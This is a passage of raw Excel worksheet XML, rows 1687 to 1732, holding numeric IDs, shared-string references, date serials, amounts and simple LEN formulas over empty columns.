      <c r="H1687">
        <v>300000</v>
      </c>
      <c r="K1687">
        <f>LEN(I1687)</f>
        <v>0</v>
      </c>
      <c r="L1687">
        <f>LEN(J1687)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1688" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1688">
        <v>17031</v>
      </c>
      <c r="B1688">
        <v>1598</v>
      </c>
      <c r="C1688" t="s">
        <v>2703</v>
      </c>
      <c r="D1688" t="s">
        <v>9630</v>
      </c>
      <c r="E1688">
        <v>26</v>
      </c>
      <c r="F1688" t="s">
        <v>9633</v>
      </c>
      <c r="G1688" s="1">
        <v>43851</v>
      </c>
      <c r="H1688">
        <v>30000</v>
      </c>
      <c r="K1688">
        <f>LEN(I1688)</f>
        <v>0</v>
      </c>
      <c r="L1688">
        <f>LEN(J1688)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1689" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1689">
        <v>17033</v>
      </c>
      <c r="B1689">
        <v>2056</v>
      </c>
      <c r="C1689" t="s">
        <v>4860</v>
      </c>
      <c r="D1689" t="s">
        <v>9635</v>
      </c>
      <c r="E1689">
        <v>16</v>
      </c>
      <c r="F1689" t="s">
        <v>9453</v>
      </c>
      <c r="G1689" s="1">
        <v>43852</v>
      </c>
      <c r="H1689">
        <v>20000</v>
      </c>
      <c r="K1689">
        <f>LEN(I1689)</f>
        <v>0</v>
      </c>
      <c r="L1689">
        <f>LEN(J1689)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1690" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1690">
        <v>17034</v>
      </c>
      <c r="B1690">
        <v>2056</v>
      </c>
      <c r="C1690" t="s">
        <v>4860</v>
      </c>
      <c r="D1690" t="s">
        <v>9635</v>
      </c>
      <c r="E1690">
        <v>16</v>
      </c>
      <c r="F1690" t="s">
        <v>547</v>
      </c>
      <c r="G1690" s="1">
        <v>43852</v>
      </c>
      <c r="H1690">
        <v>21000</v>
      </c>
      <c r="K1690">
        <f>LEN(I1690)</f>
        <v>0</v>
      </c>
      <c r="L1690">
        <f>LEN(J1690)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1691" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1691">
        <v>17035</v>
      </c>
      <c r="B1691">
        <v>2056</v>
      </c>
      <c r="C1691" t="s">
        <v>4860</v>
      </c>
      <c r="D1691" t="s">
        <v>9635</v>
      </c>
      <c r="E1691">
        <v>16</v>
      </c>
      <c r="F1691" t="s">
        <v>9636</v>
      </c>
      <c r="G1691" s="1">
        <v>43852</v>
      </c>
      <c r="H1691">
        <v>48000</v>
      </c>
      <c r="K1691">
        <f>LEN(I1691)</f>
        <v>0</v>
      </c>
      <c r="L1691">
        <f>LEN(J1691)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1692" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1692">
        <v>17036</v>
      </c>
      <c r="B1692">
        <v>2056</v>
      </c>
      <c r="C1692" t="s">
        <v>4860</v>
      </c>
      <c r="D1692" t="s">
        <v>9635</v>
      </c>
      <c r="E1692">
        <v>16</v>
      </c>
      <c r="F1692" t="s">
        <v>3204</v>
      </c>
      <c r="G1692" s="1">
        <v>43852</v>
      </c>
      <c r="H1692">
        <v>46800</v>
      </c>
      <c r="K1692">
        <f>LEN(I1692)</f>
        <v>0</v>
      </c>
      <c r="L1692">
        <f>LEN(J1692)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1693" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1693">
        <v>17064</v>
      </c>
      <c r="B1693">
        <v>2206</v>
      </c>
      <c r="C1693" t="s">
        <v>4845</v>
      </c>
      <c r="D1693" t="s">
        <v>9644</v>
      </c>
      <c r="E1693">
        <v>2</v>
      </c>
      <c r="F1693" t="s">
        <v>9546</v>
      </c>
      <c r="G1693" s="1">
        <v>43846</v>
      </c>
      <c r="H1693">
        <v>150000</v>
      </c>
      <c r="K1693">
        <f>LEN(I1693)</f>
        <v>0</v>
      </c>
      <c r="L1693">
        <f>LEN(J1693)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1694" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1694">
        <v>17065</v>
      </c>
      <c r="B1694">
        <v>2206</v>
      </c>
      <c r="C1694" t="s">
        <v>4845</v>
      </c>
      <c r="D1694" t="s">
        <v>9644</v>
      </c>
      <c r="E1694">
        <v>2</v>
      </c>
      <c r="F1694" t="s">
        <v>9645</v>
      </c>
      <c r="G1694" s="1">
        <v>43846</v>
      </c>
      <c r="H1694">
        <v>100000</v>
      </c>
      <c r="K1694">
        <f>LEN(I1694)</f>
        <v>0</v>
      </c>
      <c r="L1694">
        <f>LEN(J1694)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1695" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1695">
        <v>17066</v>
      </c>
      <c r="B1695">
        <v>2206</v>
      </c>
      <c r="C1695" t="s">
        <v>4845</v>
      </c>
      <c r="D1695" t="s">
        <v>9644</v>
      </c>
      <c r="E1695">
        <v>2</v>
      </c>
      <c r="F1695" t="s">
        <v>9646</v>
      </c>
      <c r="G1695" s="1">
        <v>43846</v>
      </c>
      <c r="H1695">
        <v>300000</v>
      </c>
      <c r="K1695">
        <f>LEN(I1695)</f>
        <v>0</v>
      </c>
      <c r="L1695">
        <f>LEN(J1695)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1696" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1696">
        <v>17067</v>
      </c>
      <c r="B1696">
        <v>2302</v>
      </c>
      <c r="C1696" t="s">
        <v>6820</v>
      </c>
      <c r="D1696" t="s">
        <v>9647</v>
      </c>
      <c r="E1696">
        <v>13</v>
      </c>
      <c r="F1696" t="s">
        <v>9435</v>
      </c>
      <c r="G1696" s="1">
        <v>43872</v>
      </c>
      <c r="H1696">
        <v>0</v>
      </c>
      <c r="K1696">
        <f>LEN(I1696)</f>
        <v>0</v>
      </c>
      <c r="L1696">
        <f>LEN(J1696)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1697" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1697">
        <v>17069</v>
      </c>
      <c r="B1697">
        <v>2302</v>
      </c>
      <c r="C1697" t="s">
        <v>6820</v>
      </c>
      <c r="D1697" t="s">
        <v>9647</v>
      </c>
      <c r="E1697">
        <v>13</v>
      </c>
      <c r="F1697" t="s">
        <v>3499</v>
      </c>
      <c r="G1697" s="1">
        <v>43872</v>
      </c>
      <c r="H1697">
        <v>0</v>
      </c>
      <c r="K1697">
        <f>LEN(I1697)</f>
        <v>0</v>
      </c>
      <c r="L1697">
        <f>LEN(J1697)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1698" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1698">
        <v>17070</v>
      </c>
      <c r="B1698">
        <v>2302</v>
      </c>
      <c r="C1698" t="s">
        <v>6820</v>
      </c>
      <c r="D1698" t="s">
        <v>9647</v>
      </c>
      <c r="E1698">
        <v>13</v>
      </c>
      <c r="F1698" t="s">
        <v>9497</v>
      </c>
      <c r="G1698" s="1">
        <v>43872</v>
      </c>
      <c r="H1698">
        <v>0</v>
      </c>
      <c r="K1698">
        <f>LEN(I1698)</f>
        <v>0</v>
      </c>
      <c r="L1698">
        <f>LEN(J1698)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1699" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1699">
        <v>17071</v>
      </c>
      <c r="B1699">
        <v>2302</v>
      </c>
      <c r="C1699" t="s">
        <v>6820</v>
      </c>
      <c r="D1699" t="s">
        <v>9647</v>
      </c>
      <c r="E1699">
        <v>13</v>
      </c>
      <c r="F1699" t="s">
        <v>9649</v>
      </c>
      <c r="G1699" s="1">
        <v>43872</v>
      </c>
      <c r="H1699">
        <v>360000</v>
      </c>
      <c r="K1699">
        <f>LEN(I1699)</f>
        <v>0</v>
      </c>
      <c r="L1699">
        <f>LEN(J1699)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1700" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1700">
        <v>17074</v>
      </c>
      <c r="B1700">
        <v>2321</v>
      </c>
      <c r="C1700" t="s">
        <v>16391</v>
      </c>
      <c r="D1700" t="s">
        <v>16392</v>
      </c>
      <c r="E1700">
        <v>26</v>
      </c>
      <c r="F1700" t="s">
        <v>3462</v>
      </c>
      <c r="G1700" s="1">
        <v>43907</v>
      </c>
      <c r="H1700" s="4">
        <v>300000</v>
      </c>
      <c r="K1700">
        <f>LEN(I1700)</f>
        <v>0</v>
      </c>
      <c r="L1700">
        <f>LEN(J1700)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1701" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1701">
        <v>17075</v>
      </c>
      <c r="B1701">
        <v>2321</v>
      </c>
      <c r="C1701" t="s">
        <v>16391</v>
      </c>
      <c r="D1701" t="s">
        <v>16392</v>
      </c>
      <c r="E1701">
        <v>26</v>
      </c>
      <c r="F1701" t="s">
        <v>9651</v>
      </c>
      <c r="G1701" s="1">
        <v>43907</v>
      </c>
      <c r="H1701" s="4">
        <v>300000</v>
      </c>
      <c r="K1701">
        <f>LEN(I1701)</f>
        <v>0</v>
      </c>
      <c r="L1701">
        <f>LEN(J1701)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1702" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1702">
        <v>17077</v>
      </c>
      <c r="B1702">
        <v>2297</v>
      </c>
      <c r="C1702" t="s">
        <v>5059</v>
      </c>
      <c r="D1702" t="s">
        <v>9652</v>
      </c>
      <c r="E1702">
        <v>13</v>
      </c>
      <c r="F1702" t="s">
        <v>1016</v>
      </c>
      <c r="G1702" s="1">
        <v>43846</v>
      </c>
      <c r="H1702">
        <v>45000</v>
      </c>
      <c r="K1702">
        <f>LEN(I1702)</f>
        <v>0</v>
      </c>
      <c r="L1702">
        <f>LEN(J1702)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1703" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1703">
        <v>17098</v>
      </c>
      <c r="B1703">
        <v>2275</v>
      </c>
      <c r="C1703" t="s">
        <v>5873</v>
      </c>
      <c r="D1703" t="s">
        <v>9657</v>
      </c>
      <c r="E1703">
        <v>5</v>
      </c>
      <c r="F1703" t="s">
        <v>7241</v>
      </c>
      <c r="G1703" s="1">
        <v>44126</v>
      </c>
      <c r="H1703">
        <v>5000</v>
      </c>
      <c r="K1703">
        <f>LEN(I1703)</f>
        <v>0</v>
      </c>
      <c r="L1703">
        <f>LEN(J1703)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1704" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1704">
        <v>17105</v>
      </c>
      <c r="B1704">
        <v>2325</v>
      </c>
      <c r="C1704" t="s">
        <v>4756</v>
      </c>
      <c r="D1704" t="s">
        <v>9662</v>
      </c>
      <c r="E1704">
        <v>1</v>
      </c>
      <c r="F1704" t="s">
        <v>2236</v>
      </c>
      <c r="G1704" s="1">
        <v>43853</v>
      </c>
      <c r="H1704">
        <v>300000</v>
      </c>
      <c r="K1704">
        <f>LEN(I1704)</f>
        <v>0</v>
      </c>
      <c r="L1704">
        <f>LEN(J1704)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1705" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1705">
        <v>17106</v>
      </c>
      <c r="B1705">
        <v>2325</v>
      </c>
      <c r="C1705" t="s">
        <v>4756</v>
      </c>
      <c r="D1705" t="s">
        <v>9662</v>
      </c>
      <c r="E1705">
        <v>1</v>
      </c>
      <c r="F1705" t="s">
        <v>9663</v>
      </c>
      <c r="G1705" s="1">
        <v>43854</v>
      </c>
      <c r="H1705">
        <v>500000</v>
      </c>
      <c r="K1705">
        <f>LEN(I1705)</f>
        <v>0</v>
      </c>
      <c r="L1705">
        <f>LEN(J1705)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1706" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1706">
        <v>17107</v>
      </c>
      <c r="B1706">
        <v>2325</v>
      </c>
      <c r="C1706" t="s">
        <v>4756</v>
      </c>
      <c r="D1706" t="s">
        <v>9662</v>
      </c>
      <c r="E1706">
        <v>1</v>
      </c>
      <c r="F1706" t="s">
        <v>3814</v>
      </c>
      <c r="G1706" s="1">
        <v>43853</v>
      </c>
      <c r="H1706">
        <v>200000</v>
      </c>
      <c r="K1706">
        <f>LEN(I1706)</f>
        <v>0</v>
      </c>
      <c r="L1706">
        <f>LEN(J1706)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1707" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1707">
        <v>17108</v>
      </c>
      <c r="B1707">
        <v>2325</v>
      </c>
      <c r="C1707" t="s">
        <v>4756</v>
      </c>
      <c r="D1707" t="s">
        <v>9662</v>
      </c>
      <c r="E1707">
        <v>1</v>
      </c>
      <c r="F1707" t="s">
        <v>9664</v>
      </c>
      <c r="G1707" s="1">
        <v>43854</v>
      </c>
      <c r="H1707">
        <v>500000</v>
      </c>
      <c r="K1707">
        <f>LEN(I1707)</f>
        <v>0</v>
      </c>
      <c r="L1707">
        <f>LEN(J1707)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1708" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1708">
        <v>17109</v>
      </c>
      <c r="B1708">
        <v>2325</v>
      </c>
      <c r="C1708" t="s">
        <v>4756</v>
      </c>
      <c r="D1708" t="s">
        <v>9662</v>
      </c>
      <c r="E1708">
        <v>1</v>
      </c>
      <c r="F1708" t="s">
        <v>9217</v>
      </c>
      <c r="G1708" s="1">
        <v>43853</v>
      </c>
      <c r="H1708">
        <v>100000</v>
      </c>
      <c r="K1708">
        <f>LEN(I1708)</f>
        <v>0</v>
      </c>
      <c r="L1708">
        <f>LEN(J1708)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1709" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1709">
        <v>17110</v>
      </c>
      <c r="B1709">
        <v>2325</v>
      </c>
      <c r="C1709" t="s">
        <v>4756</v>
      </c>
      <c r="D1709" t="s">
        <v>9662</v>
      </c>
      <c r="E1709">
        <v>1</v>
      </c>
      <c r="F1709" t="s">
        <v>5434</v>
      </c>
      <c r="G1709" s="1">
        <v>43853</v>
      </c>
      <c r="H1709">
        <v>100000</v>
      </c>
      <c r="K1709">
        <f>LEN(I1709)</f>
        <v>0</v>
      </c>
      <c r="L1709">
        <f>LEN(J1709)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1710" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1710">
        <v>17111</v>
      </c>
      <c r="B1710">
        <v>2325</v>
      </c>
      <c r="C1710" t="s">
        <v>4756</v>
      </c>
      <c r="D1710" t="s">
        <v>9662</v>
      </c>
      <c r="E1710">
        <v>1</v>
      </c>
      <c r="F1710" t="s">
        <v>9665</v>
      </c>
      <c r="G1710" s="1">
        <v>43854</v>
      </c>
      <c r="H1710">
        <v>500000</v>
      </c>
      <c r="K1710">
        <f>LEN(I1710)</f>
        <v>0</v>
      </c>
      <c r="L1710">
        <f>LEN(J1710)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1711" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1711">
        <v>17113</v>
      </c>
      <c r="B1711">
        <v>246</v>
      </c>
      <c r="C1711" t="s">
        <v>2447</v>
      </c>
      <c r="D1711" t="s">
        <v>9580</v>
      </c>
      <c r="E1711">
        <v>16</v>
      </c>
      <c r="F1711" t="s">
        <v>9666</v>
      </c>
      <c r="G1711" s="1">
        <v>43847</v>
      </c>
      <c r="H1711">
        <v>2800000</v>
      </c>
      <c r="K1711">
        <f>LEN(I1711)</f>
        <v>0</v>
      </c>
      <c r="L1711">
        <f>LEN(J1711)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1712" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1712">
        <v>17115</v>
      </c>
      <c r="B1712">
        <v>246</v>
      </c>
      <c r="C1712" t="s">
        <v>2447</v>
      </c>
      <c r="D1712" t="s">
        <v>9580</v>
      </c>
      <c r="E1712">
        <v>16</v>
      </c>
      <c r="F1712" t="s">
        <v>2236</v>
      </c>
      <c r="G1712" s="1">
        <v>43847</v>
      </c>
      <c r="H1712">
        <v>500000</v>
      </c>
      <c r="K1712">
        <f>LEN(I1712)</f>
        <v>0</v>
      </c>
      <c r="L1712">
        <f>LEN(J1712)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1713" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1713">
        <v>17116</v>
      </c>
      <c r="B1713">
        <v>246</v>
      </c>
      <c r="C1713" t="s">
        <v>2447</v>
      </c>
      <c r="D1713" t="s">
        <v>9580</v>
      </c>
      <c r="E1713">
        <v>16</v>
      </c>
      <c r="F1713" t="s">
        <v>9667</v>
      </c>
      <c r="G1713" s="1">
        <v>43847</v>
      </c>
      <c r="H1713">
        <v>2800000</v>
      </c>
      <c r="K1713">
        <f>LEN(I1713)</f>
        <v>0</v>
      </c>
      <c r="L1713">
        <f>LEN(J1713)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1714" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1714">
        <v>17119</v>
      </c>
      <c r="B1714">
        <v>246</v>
      </c>
      <c r="C1714" t="s">
        <v>2447</v>
      </c>
      <c r="D1714" t="s">
        <v>9580</v>
      </c>
      <c r="E1714">
        <v>16</v>
      </c>
      <c r="F1714" t="s">
        <v>9668</v>
      </c>
      <c r="G1714" s="1">
        <v>43847</v>
      </c>
      <c r="H1714">
        <v>1000000</v>
      </c>
      <c r="K1714">
        <f>LEN(I1714)</f>
        <v>0</v>
      </c>
      <c r="L1714">
        <f>LEN(J1714)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1715" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1715">
        <v>17120</v>
      </c>
      <c r="B1715">
        <v>246</v>
      </c>
      <c r="C1715" t="s">
        <v>2447</v>
      </c>
      <c r="D1715" t="s">
        <v>9580</v>
      </c>
      <c r="E1715">
        <v>16</v>
      </c>
      <c r="F1715" t="s">
        <v>9567</v>
      </c>
      <c r="G1715" s="1">
        <v>43847</v>
      </c>
      <c r="H1715">
        <v>1500000</v>
      </c>
      <c r="K1715">
        <f>LEN(I1715)</f>
        <v>0</v>
      </c>
      <c r="L1715">
        <f>LEN(J1715)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1716" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1716">
        <v>17123</v>
      </c>
      <c r="B1716">
        <v>248</v>
      </c>
      <c r="C1716" t="s">
        <v>1344</v>
      </c>
      <c r="D1716" t="s">
        <v>9669</v>
      </c>
      <c r="E1716">
        <v>16</v>
      </c>
      <c r="F1716" t="s">
        <v>9444</v>
      </c>
      <c r="G1716" s="1">
        <v>43847</v>
      </c>
      <c r="H1716">
        <v>720000</v>
      </c>
      <c r="K1716">
        <f>LEN(I1716)</f>
        <v>0</v>
      </c>
      <c r="L1716">
        <f>LEN(J1716)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1717" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1717">
        <v>17124</v>
      </c>
      <c r="B1717">
        <v>248</v>
      </c>
      <c r="C1717" t="s">
        <v>1344</v>
      </c>
      <c r="D1717" t="s">
        <v>9669</v>
      </c>
      <c r="E1717">
        <v>16</v>
      </c>
      <c r="F1717" t="s">
        <v>9670</v>
      </c>
      <c r="G1717" s="1">
        <v>43847</v>
      </c>
      <c r="H1717">
        <v>50000</v>
      </c>
      <c r="K1717">
        <f>LEN(I1717)</f>
        <v>0</v>
      </c>
      <c r="L1717">
        <f>LEN(J1717)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1718" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1718">
        <v>17125</v>
      </c>
      <c r="B1718">
        <v>368</v>
      </c>
      <c r="C1718" t="s">
        <v>1436</v>
      </c>
      <c r="D1718" t="s">
        <v>9671</v>
      </c>
      <c r="E1718">
        <v>14</v>
      </c>
      <c r="F1718" t="s">
        <v>9672</v>
      </c>
      <c r="G1718" s="1">
        <v>43871</v>
      </c>
      <c r="H1718">
        <v>0</v>
      </c>
      <c r="K1718">
        <f>LEN(I1718)</f>
        <v>0</v>
      </c>
      <c r="L1718">
        <f>LEN(J1718)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1719" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1719">
        <v>17126</v>
      </c>
      <c r="B1719">
        <v>368</v>
      </c>
      <c r="C1719" t="s">
        <v>1436</v>
      </c>
      <c r="D1719" t="s">
        <v>9671</v>
      </c>
      <c r="E1719">
        <v>14</v>
      </c>
      <c r="F1719" t="s">
        <v>9673</v>
      </c>
      <c r="G1719" s="1">
        <v>43871</v>
      </c>
      <c r="H1719">
        <v>0</v>
      </c>
      <c r="K1719">
        <f>LEN(I1719)</f>
        <v>0</v>
      </c>
      <c r="L1719">
        <f>LEN(J1719)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1720" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1720">
        <v>17127</v>
      </c>
      <c r="B1720">
        <v>368</v>
      </c>
      <c r="C1720" t="s">
        <v>1436</v>
      </c>
      <c r="D1720" t="s">
        <v>9671</v>
      </c>
      <c r="E1720">
        <v>14</v>
      </c>
      <c r="F1720" t="s">
        <v>4686</v>
      </c>
      <c r="G1720" s="1">
        <v>43871</v>
      </c>
      <c r="H1720">
        <v>0</v>
      </c>
      <c r="K1720">
        <f>LEN(I1720)</f>
        <v>0</v>
      </c>
      <c r="L1720">
        <f>LEN(J1720)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1721" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1721">
        <v>17128</v>
      </c>
      <c r="B1721">
        <v>368</v>
      </c>
      <c r="C1721" t="s">
        <v>1436</v>
      </c>
      <c r="D1721" t="s">
        <v>9671</v>
      </c>
      <c r="E1721">
        <v>14</v>
      </c>
      <c r="F1721" t="s">
        <v>9577</v>
      </c>
      <c r="G1721" s="1">
        <v>43871</v>
      </c>
      <c r="H1721">
        <v>0</v>
      </c>
      <c r="K1721">
        <f>LEN(I1721)</f>
        <v>0</v>
      </c>
      <c r="L1721">
        <f>LEN(J1721)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1722" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1722">
        <v>17129</v>
      </c>
      <c r="B1722">
        <v>368</v>
      </c>
      <c r="C1722" t="s">
        <v>1436</v>
      </c>
      <c r="D1722" t="s">
        <v>9671</v>
      </c>
      <c r="E1722">
        <v>14</v>
      </c>
      <c r="F1722" t="s">
        <v>9674</v>
      </c>
      <c r="G1722" s="1">
        <v>43871</v>
      </c>
      <c r="H1722">
        <v>0</v>
      </c>
      <c r="K1722">
        <f>LEN(I1722)</f>
        <v>0</v>
      </c>
      <c r="L1722">
        <f>LEN(J1722)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1723" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1723">
        <v>17130</v>
      </c>
      <c r="B1723">
        <v>368</v>
      </c>
      <c r="C1723" t="s">
        <v>1436</v>
      </c>
      <c r="D1723" t="s">
        <v>9671</v>
      </c>
      <c r="E1723">
        <v>14</v>
      </c>
      <c r="F1723" t="s">
        <v>9533</v>
      </c>
      <c r="G1723" s="1">
        <v>43871</v>
      </c>
      <c r="H1723">
        <v>5000</v>
      </c>
      <c r="K1723">
        <f>LEN(I1723)</f>
        <v>0</v>
      </c>
      <c r="L1723">
        <f>LEN(J1723)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1724" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1724">
        <v>17132</v>
      </c>
      <c r="B1724">
        <v>368</v>
      </c>
      <c r="C1724" t="s">
        <v>1436</v>
      </c>
      <c r="D1724" t="s">
        <v>9671</v>
      </c>
      <c r="E1724">
        <v>14</v>
      </c>
      <c r="F1724" t="s">
        <v>9675</v>
      </c>
      <c r="G1724" s="1">
        <v>43871</v>
      </c>
      <c r="H1724">
        <v>5000</v>
      </c>
      <c r="K1724">
        <f>LEN(I1724)</f>
        <v>0</v>
      </c>
      <c r="L1724">
        <f>LEN(J1724)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1725" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1725">
        <v>17133</v>
      </c>
      <c r="B1725">
        <v>368</v>
      </c>
      <c r="C1725" t="s">
        <v>1436</v>
      </c>
      <c r="D1725" t="s">
        <v>9671</v>
      </c>
      <c r="E1725">
        <v>14</v>
      </c>
      <c r="F1725" t="s">
        <v>3814</v>
      </c>
      <c r="G1725" s="1">
        <v>43871</v>
      </c>
      <c r="H1725">
        <v>10000</v>
      </c>
      <c r="K1725">
        <f>LEN(I1725)</f>
        <v>0</v>
      </c>
      <c r="L1725">
        <f>LEN(J1725)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1726" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1726">
        <v>17139</v>
      </c>
      <c r="B1726">
        <v>133</v>
      </c>
      <c r="C1726" t="s">
        <v>264</v>
      </c>
      <c r="D1726" t="s">
        <v>9680</v>
      </c>
      <c r="E1726">
        <v>12</v>
      </c>
      <c r="F1726" t="s">
        <v>9681</v>
      </c>
      <c r="G1726" s="1">
        <v>43871</v>
      </c>
      <c r="H1726">
        <v>80</v>
      </c>
      <c r="K1726">
        <f>LEN(I1726)</f>
        <v>0</v>
      </c>
      <c r="L1726">
        <f>LEN(J1726)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1727" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1727">
        <v>17140</v>
      </c>
      <c r="B1727">
        <v>133</v>
      </c>
      <c r="C1727" t="s">
        <v>264</v>
      </c>
      <c r="D1727" t="s">
        <v>9680</v>
      </c>
      <c r="E1727">
        <v>12</v>
      </c>
      <c r="F1727" t="s">
        <v>609</v>
      </c>
      <c r="G1727" s="1">
        <v>43871</v>
      </c>
      <c r="H1727">
        <v>100</v>
      </c>
      <c r="K1727">
        <f>LEN(I1727)</f>
        <v>0</v>
      </c>
      <c r="L1727">
        <f>LEN(J1727)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1728" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1728">
        <v>17148</v>
      </c>
      <c r="B1728">
        <v>247</v>
      </c>
      <c r="C1728" t="s">
        <v>2451</v>
      </c>
      <c r="D1728" t="s">
        <v>9683</v>
      </c>
      <c r="E1728">
        <v>16</v>
      </c>
      <c r="F1728" t="s">
        <v>9670</v>
      </c>
      <c r="G1728" s="1">
        <v>43847</v>
      </c>
      <c r="H1728">
        <v>165900</v>
      </c>
      <c r="K1728">
        <f>LEN(I1728)</f>
        <v>0</v>
      </c>
      <c r="L1728">
        <f>LEN(J1728)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1729" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1729">
        <v>17153</v>
      </c>
      <c r="B1729">
        <v>1061</v>
      </c>
      <c r="C1729" t="s">
        <v>16393</v>
      </c>
      <c r="D1729" t="s">
        <v>16394</v>
      </c>
      <c r="E1729">
        <v>2</v>
      </c>
      <c r="F1729" t="s">
        <v>547</v>
      </c>
      <c r="G1729" s="1">
        <v>43894</v>
      </c>
      <c r="H1729" s="4">
        <v>70000</v>
      </c>
      <c r="K1729">
        <f>LEN(I1729)</f>
        <v>0</v>
      </c>
      <c r="L1729">
        <f>LEN(J1729)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1730" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1730">
        <v>17154</v>
      </c>
      <c r="B1730">
        <v>2308</v>
      </c>
      <c r="C1730" t="s">
        <v>5579</v>
      </c>
      <c r="D1730" t="s">
        <v>9584</v>
      </c>
      <c r="E1730">
        <v>29</v>
      </c>
      <c r="F1730" t="s">
        <v>9684</v>
      </c>
      <c r="G1730" s="1">
        <v>43858</v>
      </c>
      <c r="H1730">
        <v>0</v>
      </c>
      <c r="K1730">
        <f>LEN(I1730)</f>
        <v>0</v>
      </c>
      <c r="L1730">
        <f>LEN(J1730)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1731" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1731">
        <v>17166</v>
      </c>
      <c r="B1731">
        <v>247</v>
      </c>
      <c r="C1731" t="s">
        <v>2451</v>
      </c>
      <c r="D1731" t="s">
        <v>9683</v>
      </c>
      <c r="E1731">
        <v>16</v>
      </c>
      <c r="F1731" t="s">
        <v>9706</v>
      </c>
      <c r="G1731" s="1">
        <v>43847</v>
      </c>
      <c r="H1731">
        <v>113684</v>
      </c>
      <c r="K1731">
        <f>LEN(I1731)</f>
        <v>0</v>
      </c>
      <c r="L1731">
        <f>LEN(J1731)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1732" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1732">
        <v>17167</v>
      </c>
      <c r="B1732">
        <v>247</v>
      </c>
      <c r="C1732" t="s">
        <v>2451</v>
      </c>
      <c r="D1732" t="s">
        <v>9683</v>
      </c>
      <c r="E1732">
        <v>16</v>
      </c>
      <c r="F1732" t="s">
        <v>9441</v>
      </c>
      <c r="G1732" s="1">
        <v>43847</v>
      </c>
      <c r="H1732">
        <v>1099000</v>
      </c>
      <c r="K1732">
        <f>LEN(I1732)</f>
        <v>0</v>
      </c>
      <c r="L1732">
        <f>LEN(J1732)</f>
        <v>0</v>
      </c>
    </row>
